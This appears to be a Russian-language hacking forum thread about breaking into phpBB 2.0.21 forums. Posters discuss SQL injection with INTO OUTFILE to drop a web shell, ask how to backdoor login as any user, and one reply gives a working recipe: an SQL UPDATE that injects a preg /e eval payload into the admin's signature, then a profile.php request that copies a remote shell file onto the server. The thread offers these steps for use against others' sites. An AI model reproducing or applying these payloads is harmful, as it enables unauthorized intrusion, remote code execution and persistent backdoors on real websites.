А что делать если profile.php просто нету?

Схожая проблема, только чуть сложнее
2.0.21 чистый (без модов).
Админка есть
нулевой байт экранируется
мускуль-иньекция в скрипте ЦМС (не пхпбб)
чкрез восстановление БД - то же не получится, форум криво настроен, что нельзя сделать декап БД (оказалось что иногда криворукость помогает))))
Не пойму другого:
стараюсь делать через иньекцию INTO OUTFILE в */avatars/shel.php через CHAR или через 0x
Сервер мне только выдает строку в странице ту что после select но в файл не выводит
LOAD_FILE - вообще ни чего не выводит, но это я понял на всех хостингах, на моем тоже не выводит при чистом запросе из мускуль клиента.
Можно что то еще сделать по этим признакам?
спасибо
ЗЫ
Все работает!! Это я про експлоит Шанкара, рано разочаровался, то экранировало нул. байт в запросе SQL а через эксплойт все прошло! Вери гуд!

Не могу найти тему. Если кто помнит подскажите. Как сохранить возможность в phpbb заходить под любым логином. Там надо было добавить код при авторизации (был нужен доступ по ftp)

проще всего залить шелл:
создаем 1.sql cо следующим содержанием:
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:eval(stripslashes($_REQUEST[c]));' WHERE user_id=2;

далее:
profile.php?mode=editprofile&c=copy('http://127.0.0.1/shell.txt','/home/home/public_html/forum/shell.php');

Всё готово